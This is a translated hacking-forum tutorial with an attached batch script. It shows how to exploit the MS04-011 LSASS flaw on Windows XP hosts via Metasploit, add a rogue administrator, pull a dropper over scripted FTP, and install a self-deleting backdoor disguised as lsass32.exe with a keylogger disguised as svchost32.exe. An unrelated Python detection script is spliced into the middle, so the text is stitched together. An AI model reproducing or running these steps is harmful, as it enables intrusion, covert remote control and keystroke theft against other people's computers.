Andreas Gant Eng

Just a share from Andreas.

Let's practice ... The tools needed are:

* We'll just use the Windows OS:
1. IP Scanner (SuperScan version 3.00 is pretty reliable). Download at: http://www.webattack.com/get/superscan.shtml
2. Metasploit Framework for Win32 (latest version 2.3). Download at: http://metasploit.com/tools/framework-2.3.exe
3. FTP Server program (IIS works, ArgoFTP etc., whatever you like)
4. Backdoor file package, download at: http://unique.freeunixhost.com/bnm/HeLL.tar.gz
5. Remote Administrator Viewer, download at: http://www.famatech.com/download/rviewer3.exe
6. Script to put/plant the BackDoor (I wrote it in the BATCH language (bnm.bat) - attached)

Okay, let's begin ...

* Download all the files needed above.
* Install Metasploit Framework first, run its Setup (framework-2.3.exe)
* Install SuperScan.
* Install Remote Administrator Viewer.
* Extract the file HeLL.tar.gz into some folder, e.g. c:\door
* Set up the FTP service (IIS or another, your choice). Start the service.
* Set the FTP Home directory to the folder c:\door
* Set user access so that Anonymous can access the Home directory.
* Test by opening Explorer and typing in the address bar: ftp://localhost or ftp://[our IP]; e.g. if our IP is 192.168.1.80 then try opening ftp://192.168.1.80

No problems, right?? Okay, let's continue ...

* Next we look for a target ... open the IP Scanner application (SuperScan) and fill in the Start IP and Stop IP range, e.g. from 192.168.1.1 to 192.168.55.1 (depends on the state of your network, adjust the target range yourself).

* Say the IPs we get are 192.168.1.90, 192.168.1.102, 192.168.1.180, etc.
* Once we have the list of target IPs, next we open Metasploit Framework.
* Once it's ready, the prompt appears: msf > type the following commands:

----- snapshot -----
msf > use lsass_ms04_011 [ENTER]
msf lsass_ms04_011 > set PAYLOAD win32_bind [ENTER]
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.1.90 [ENTER]
msf lsass_ms04_011(win32_bind) > exploit [ENTER]

[*] Starting Bind Handler.
[*] Detected a Windows XP target (Prof_Joni)
[*] Windows XP may require two attempts
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.1.90:4321 192.168.1.80:4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>_
----- end of snapshot -----

Now, if it looks like that, it means we have a Dropped Shell in our Metasploit. What is displayed there is the Shell of our target computer ... connected remotely. In that Shell we have Administrator access rights (because it is the result of a Buffer Overflow exploit).

Meaning: we have unlimited rights over our target computer. To test it, just try typing the following commands there:

C:\WINDOWS\system32> NET USER LoCK /ADD
C:\WINDOWS\system32> net localgroup Administrators LoCK /add

--- snapshot ---
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>NET USER LoCK /ADD
NET USER LoCK /ADD
The command completed successfully.

C:\WINDOWS\system32>net localgroup Administrators LoCK /add
net localgroup Administrators LoCK /add
The command completed successfully.
--- end of snapshot ---

See, we can add a new user in the Administrators group on the target computer. hehehe That's enough for now ... we'll play around more later ...

* Now let's make a backdoor so that we can get back into the target box whenever we want. Still at the DOS Shell prompt from before, we type the following commands:

--> remember, in this case our computer's IP is 192.168.1.80

C:\WINDOWS\system32> echo OPEN 192.168.1.80>>tmp [ENTER]
C:\WINDOWS\system32> echo USER anonymous>>tmp [ENTER]
C:\WINDOWS\system32> echo [email protected]>>tmp [ENTER]
C:\WINDOWS\system32> echo GET bnm.bat>>tmp [ENTER]
C:\WINDOWS\system32> echo BYE>>tmp [ENTER]
C:\WINDOWS\system32> ftp -n -s:tmp [ENTER]
ftp -n -s:tmp
OPEN 192.168.1.80
USER anonymous

GET bnm.bat
BYE

C:\WINDOWS\system32> bnm.bat 192.168.1.80 [ENTER]
BOF=======================================================
BNM's Remote Backdoor Connection Creator
==========================================================
Written by : UNiQUE aka. BNM
Last modified : 9:49 AM 1/21/2005
Last Featues : * faked r_server
* sc-keylogga` added
* fake-winsp3 bull-shitting
* self-protection added
----------------------------------------------------------

----------------------------------------------------------
#1 Meracik script buat Download File-file yg diperlukan :
----------------------------------------------------------
--- [] File script: 'bnm' telah dibuat.
---------------------------------------------------------
--- [] Lanjut dengan Execute script 'bnm' ...
....bla bla bla....
---------------------------------------------------------
SEMUA PROSES TELAH SELESAI, HOST INI JADI MILIK ANDA
---------------------------------------------------------
Silahkan Remote dengan Remote Admin ke sini
*** Password : andreasganteng
---------------------------------------------------------
SC-KeyLogga Dah ditanem di sini
*** Mo panen : andreasganteng.bnm.txt
---------------------------------------------------------
regards./
ISD_andreas AKA adul andreas strenger
mail : [email protected]
chat : irc.allnetwork.org:6667 #moklet @UNiQUE
---------------------------------------------------------
Have Fun ... but, be responsible ... :P~
--------------------------------------------------- EOF -
The system cannot find the path specified.

C:\WINDOWS>
------------ end of snapshot ----------

* Now ... the BackDoor is planted on the target computer. From now on we can go back there any time: just open the Remote Admin Viewer application (radmin.exe) and connect to that target IP. Choose the connection type:

* Full Remote (Full Screen)
* View Only
* Telnet
* File Transfer
* Shutdown
* Restart
* Logoff
* delete.
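For the defender's side of the chain walked through above (a command shell spawned by lsass.exe after the overflow, `net user`/`net localgroup Administrators` creating a local admin, the scripted `ftp -n -s:` download, and lookalike binaries such as lsass32.exe started outside system32), here is an added Python detector that is not part of the original post. The process-creation records are constructed samples using Sysmon Event ID 1 field names, not real logs; the time window and the list of system process names are assumptions.

```python
import re
from typing import Dict, Iterable, List

# Constructed process-creation records (Sysmon Event ID 1 field names) that
# replay the chain above; the last record is the real LSASS and must not fire.
SAMPLE_EVENTS = [
    {"ts": 100, "Image": r"C:\WINDOWS\system32\cmd.exe",
     "ParentImage": r"C:\WINDOWS\system32\lsass.exe", "CommandLine": "cmd.exe"},
    {"ts": 101, "Image": r"C:\WINDOWS\system32\net.exe",
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe", "CommandLine": "NET USER LoCK /ADD"},
    {"ts": 102, "Image": r"C:\WINDOWS\system32\net.exe", "ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": "net localgroup Administrators LoCK /add"},
    {"ts": 110, "Image": r"C:\WINDOWS\system32\ftp.exe",
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe", "CommandLine": "ftp -n -s:tmp"},
    {"ts": 120, "Image": r"C:\WINDOWS\lsass32.exe", "ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": "lsass32 /pass:bnm /silence /install /save"},
    {"ts": 500, "Image": r"C:\WINDOWS\system32\lsass.exe",
     "ParentImage": r"C:\WINDOWS\system32\wininit.exe", "CommandLine": "lsass.exe"},
]

SYSTEM_PROCS = ("lsass", "svchost", "services", "winlogon")  # assumed watch list
USER_ADD = re.compile(r"\bnet1?\s+user\s+(\S+)\s+.*?/add\b", re.I)
ADMIN_ADD = re.compile(r"\bnet1?\s+localgroup\s+administrators\s+(\S+)\s+.*?/add\b", re.I)
FTP_SCRIPT = re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I)

def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def detect(events: Iterable[Dict], window: int = 300) -> List[str]:
    """Return one alert string per suspicious process-creation record, in order."""
    alerts: List[str] = []
    pending = None  # (user, ts) of the last "net user X /add" seen
    for e in events:
        img, parent, cmd = basename(e["Image"]), basename(e["ParentImage"]), e["CommandLine"]
        # 1. LSASS has no business spawning a command shell: classic sign of the overflow.
        if parent == "lsass.exe" and img in ("cmd.exe", "powershell.exe"):
            alerts.append(f"{e['ts']}: shell {img} spawned by lsass.exe")
        # 2. net user /add followed by net localgroup Administrators /add for the same user.
        if m := USER_ADD.search(cmd):
            pending = (m.group(1).lower(), e["ts"])
        if (m := ADMIN_ADD.search(cmd)) and pending and pending[0] == m.group(1).lower() \
                and e["ts"] - pending[1] <= window:
            alerts.append(f"{e['ts']}: new local admin '{m.group(1)}' created")
        # 3. ftp -n -s:<file> is the scripted download used to fetch the dropper.
        if FTP_SCRIPT.search(cmd):
            alerts.append(f"{e['ts']}: scripted ftp transfer: {cmd}")
        # 4. Lookalike names (lsass32.exe, svchost32.exe) or a real name outside system32.
        stem = img[:-4] if img.endswith(".exe") else img
        if any(stem.startswith(p) and stem != p for p in SYSTEM_PROCS) \
                or (stem in SYSTEM_PROCS and "\\system32\\" not in e["Image"].lower()):
            alerts.append(f"{e['ts']}: lookalike system binary {e['Image']}")
    return alerts
```

Running `detect(SAMPLE_EVENTS)` yields four alerts (timestamps 100, 102, 110 and 120) and nothing for the genuine lsass.exe record.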

* That's it ... That's All Folks !!

-UNiQUE-

Shout to: #ISD #HNC #newbie - indonesiansecuritydown.org

we are not criminals

-----------------------------------------------------------------
attachment:
Script : Backdoor Creator
Language : DOS Batch Executable
Author : UNiQUE aka BNM
FileName : andreasganteng ( bnm.bat)
Note : Open Notepad, copy + paste the following script, then save it under the name andreasganteng (bnm.bat)

---------- cut starting below this line ------------------------------
@ echo off
cls
echo==================================================================
echo By Using this Script, You're AGREE alias SETUJU atas Perjanjian Berikut:
echo==================================================================
echo echo echo P
echo.
echo TERIMA KASIH, TENKYU ...
echo.
echo ANY COMMENTS, SEND TO: [email protected] %windir%
echo BOF=======================================================
echo BNM's Remote Backdoor Connection Creator
echo ==========================================================
echo Written by : UNiQUE aka. BNM
echo Last modified : 9:49 AM 1/21/2005
echo Last Featues : * faked r_server
echo * sc-keylogga` added
echo * fake-winsp3 bull-shitting
echo * self-protection added
echo ----------------------------------------------------------
echo.

if "%1"=="" GOTO PIYE

echo ----------------------------------------------------------
echo #1 Meracik script buat Download File-file yg diperlukan :
echo ----------------------------------------------------------
echo open "%1">>bnm
echo user anonymous>>bnm
echo password>>bnm
echo binary>>bnm
echo get lsass32.exe>>bnm
REM echo get winsp3.exe>>bnm
echo get svchost32.exe>>bnm
echo get firewall64.exe>>bnm
echo get admdll.dll>>bnm
echo get raddrv.dll>>bnm
echo get kl.dll>>bnm
echo bye>>bnm
echo --- [] File script: 'bnm' telah dibuat.
echo ---------------------------------------------------------
echo --- [] Lanjut dengan Execute script 'bnm' ...
echo ---------------------------------------------------------
ftp -n -s:bnm
echo ---------------------------------------------------------
echo --- [] Selesaii ...
echo --- [] Menghapus file script 'bnm'.
del bnm
echo ---------------------------------------------------------
echo.
echo ---------------------------------------------------------
echo #2 Menyiapkan Serphiz Remote Admin Server :
echo ---------------------------------------------------------
lsass32 /pass:bnm /silence /install /save
echo --- faked r_server telah di set dengan:
echo --- [] Password : andreasganteng.
echo --- [] Jalan sebagai Service.
echo --- [] Simpan setting ke Registry.
echo --- [] Mode Silence.
echo ---------------------------------------------------------
echo.
echo ---------------------------------------------------------
echo #3 Jalankan Faked Remote Admin Server :
echo ---------------------------------------------------------
start lsass32.exe
echo --- Service Berjalan ....
echo.
echo ---------------------------------------------------------
echo #4 Menyiapkan Keylogga` :
echo ---------------------------------------------------------
start svchost32 -a -s -f andreas.php
start firewall64
echo --- SC-Keylogga` telah diset autostart dan berjalan ...
echo.
echo ---------------------------------------------------------
echo #5 Bull Shitting WinSP3 to the LaMaz :
echo ---------------------------------------------------------
REM copy winsp3.exe c:\winsp3.exe
echo ............. SKIPPED
REM echo --- Bull Shitting selesai ...
echo.
ipconfig
echo ---------------------------------------------------------
echo SEMUA PROSES TELAH SELESAI, HOST INI JADI MILIK ANDA
echo ---------------------------------------------------------
echo Silahkan Remote dengan Remote Admin ke sini
echo *** Password Isi aja : andreasganteng
echo ---------------------------------------------------------
echo SC-KeyLogga Dah ditanem di sini
echo *** Mo panen, ketik : type %windir%\bnm.txt
echo ---------------------------------------------------------
echo ReGarDs,
echo UNiQUE aka. BNM
echo mail : [email protected]
echo chat : irc.allnetwork.org:6667 #moklet @UNiQUE
echo ---------------------------------------------------------
echo Have Fun ... but, be responsible ... :P~
echo --------------------------------------------------- EOF -
del "%0"
GOTO USAI
:PIYE
echo Parameter IP FTP Host belum dimasukkan!!
echo contoh:
echo %0 192.168.5.189
echo.
echo *** 192.168.5.189 adalah IP FTP Host berisi file andreasganteng ( backdoor)
echo.
echo.
done